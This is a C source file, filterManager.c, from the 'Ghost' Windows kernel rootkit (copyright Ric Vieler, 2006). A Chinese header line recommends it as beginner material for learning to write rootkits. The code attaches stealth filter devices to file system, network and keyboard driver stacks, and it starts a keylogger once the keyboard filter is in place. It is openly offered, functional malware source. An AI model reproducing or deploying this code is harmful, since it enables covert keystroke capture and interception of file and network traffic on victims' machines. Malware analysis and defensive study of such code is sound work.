filtermanager.c

名为 GHOST的Win32下的Rootkit源码, 是学习ROOTKIT编写入门的优秀学习材料.

// filterManager
// Copyright Ric Vieler, 2006
// Attach to file and network drivers

#include "ntddk.h"
#include "Ghost.h"
#include "filterManager.h"
#include "keyManager.h"

NTSTATUS insertFileFilter(PDRIVER_OBJECT pDriverObject,
	PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice,
	wchar_t* deviceName)
{
	NTSTATUS			status;
	UNICODE_STRING		unicodeDeviceName;
	HANDLE				fileHandle;
	IO_STATUS_BLOCK		statusBlock = { 0 };
	OBJECT_ATTRIBUTES	objectAttributes = { 0 };
	PFILE_OBJECT		fileObject;

	// Get the device for the specified drive
	RtlInitUnicodeString( &unicodeDeviceName, deviceName );
	InitializeObjectAttributes( &objectAttributes,
		&unicodeDeviceName,
		OBJ_CASE_INSENSITIVE,
		NULL,
		NULL );

	status = ZwCreateFile( &fileHandle,
		SYNCHRONIZE|FILE_ANY_ACCESS, 
		&objectAttributes,
		&statusBlock,
		NULL,
		0,
		FILE_SHARE_READ | FILE_SHARE_WRITE, 
		FILE_OPEN,
		FILE_SYNCHRONOUS_IO_NONALERT | FILE_DIRECTORY_FILE,
		NULL,
		0 );

	if( !NT_SUCCESS( status ) )
		return status;

	status = ObReferenceObjectByHandle( fileHandle,
		FILE_READ_DATA,
		NULL,
		KernelMode,
		(PVOID *)&fileObject,
		NULL );

	if( !NT_SUCCESS( status ) )
	{
		ZwClose( fileHandle );
		return status;
	}

	*ppOldDevice = IoGetRelatedDeviceObject( fileObject );

	if( !*ppOldDevice )
	{
		ObDereferenceObject( fileObject );
		ZwClose( fileHandle );
		return STATUS_ABANDONED;
	}

	// Create a new device
    status = IoCreateDevice( pDriverObject,
         0,
         NULL,
         (*ppOldDevice)->DeviceType,
         0,
         FALSE,
         ppNewDevice );

    if( !NT_SUCCESS( status ) )
	{
		ObDereferenceObject( fileObject );
		ZwClose( fileHandle );
		return status;
	}

	// Initialize the new device
    if( (*ppOldDevice)->Flags & DO_BUFFERED_IO )
		(*ppNewDevice)->Flags |= DO_BUFFERED_IO;
    if( (*ppOldDevice)->Flags & DO_DIRECT_IO )
		(*ppNewDevice)->Flags |= DO_DIRECT_IO;
    if( (*ppOldDevice)->Characteristics & FILE_DEVICE_SECURE_OPEN )
		(*ppNewDevice)->Characteristics |= FILE_DEVICE_SECURE_OPEN;

	// Attach the new device to the old device
//	status = IoAttachDeviceToDeviceStackSafe( *ppNewDevice, *ppOldDevice, ppOldDevice );
	*ppOldDevice = IoAttachDeviceToDeviceStack( *ppNewDevice, *ppOldDevice );
	if( *ppOldDevice == NULL )
	{
		// Prevent unload if load failed
		IoDeleteDevice( *ppNewDevice );
		*ppNewDevice = NULL;
		// Clean up and return error
		ObDereferenceObject( fileObject );
		ZwClose( fileHandle );
        return STATUS_NO_SUCH_DEVICE;
	}

	ObDereferenceObject( fileObject );
	ZwClose( fileHandle );

	return STATUS_SUCCESS;
}

NTSTATUS insertNetworkFilter(PDRIVER_OBJECT pDriverObject,
	PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice,
	wchar_t* deviceName)
{
	NTSTATUS status = STATUS_SUCCESS;
	UNICODE_STRING unicodeName = { 0 };

	// Create a new device
	status = IoCreateDevice( pDriverObject,
		0,
		NULL,
		FILE_DEVICE_UNKNOWN,
		0,
		TRUE,
		ppNewDevice );

	if( !NT_SUCCESS( status ) )
		return status;

	// Initialize the new device
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= DO_DIRECT_IO;

	// Attach the new device
	RtlInitUnicodeString( &unicodeName, deviceName );
	status = IoAttachDevice( *ppNewDevice,
		&unicodeName,
		ppOldDevice );

	// Prevent unload if load failed
	if( !NT_SUCCESS( status ) )
	{
		IoDeleteDevice( *ppNewDevice );
		*ppNewDevice = NULL;
	}

	return status;
}

NTSTATUS insertKeyboardFilter(PDRIVER_OBJECT pDriverObject,
	PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice,
	wchar_t* deviceName)
{
	NTSTATUS status = STATUS_SUCCESS;
	UNICODE_STRING unicodeName = { 0 };

	// Create a new device
	status = IoCreateDevice( pDriverObject,
		0,
		NULL,
		FILE_DEVICE_KEYBOARD,
		0,
		FALSE,
		ppNewDevice );

	if( !NT_SUCCESS( status ) )
		return status;

	// Initialize the new device
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags |= (DO_BUFFERED_IO | DO_POWER_PAGABLE);
	((PDEVICE_OBJECT)(*ppNewDevice))->Flags &= ~DO_DEVICE_INITIALIZING;

	// Attach the new device
	RtlInitUnicodeString( &unicodeName, deviceName );
	status = IoAttachDevice( *ppNewDevice,
		&unicodeName,
		ppOldDevice );

	// Prevent unload if load failed
	if( !NT_SUCCESS( status ) )
	{
		IoDeleteDevice( *ppNewDevice );
		*ppNewDevice = NULL;
	}
	else
	{
		// Prepare the keylogging thread
		StartKeylogger( pDriverObject );
	}

	return status;
}

void removeFilter(PDEVICE_OBJECT* ppOldDevice,
	PDEVICE_OBJECT* ppNewDevice)
{
	IoDetachDevice( *ppOldDevice );
	IoDeleteDevice( *ppNewDevice );
}